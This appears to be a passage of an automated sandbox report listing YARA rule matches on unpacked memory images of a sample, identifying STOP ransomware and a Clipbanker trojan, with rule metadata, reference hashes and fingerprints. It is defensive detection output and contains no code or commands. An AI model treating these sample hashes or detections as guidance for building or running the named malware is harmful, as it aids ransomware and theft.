Source: 9.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 14.2.mstsca.exe.ee0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 14.2.mstsca.exe.ee0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 5.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 5.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 5.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 5.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 5.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 17.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 17.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 4.2.U59WtZz2Sg.exe.22815a0.1.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 4.2.U59WtZz2Sg.exe.22815a0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 4.2.U59WtZz2Sg.exe.22815a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 6.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 6.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 6.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 9.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0.2.U59WtZz2Sg.exe.22215a0.1.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 0.2.U59WtZz2Sg.exe.22215a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0.2.U59WtZz2Sg.exe.22215a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 17.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 17.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 1.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 17.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 17.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.0.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 9.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 9.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.0.U59WtZz2Sg.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 5.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 5.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 9.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 5.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 5.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 6.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 6.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 6.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 7.2.U59WtZz2Sg.exe.21a15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 7.2.U59WtZz2Sg.exe.21a15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 7.2.U59WtZz2Sg.exe.21a15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 7.2.U59WtZz2Sg.exe.21a15a0.1.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 7.2.U59WtZz2Sg.exe.21a15a0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 7.2.U59WtZz2Sg.exe.21a15a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.0.U59WtZz2Sg.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 17.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 17.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 17.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 17.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.U59WtZz2Sg.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 5.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 5.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 1.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.U59WtZz2Sg.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 5.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
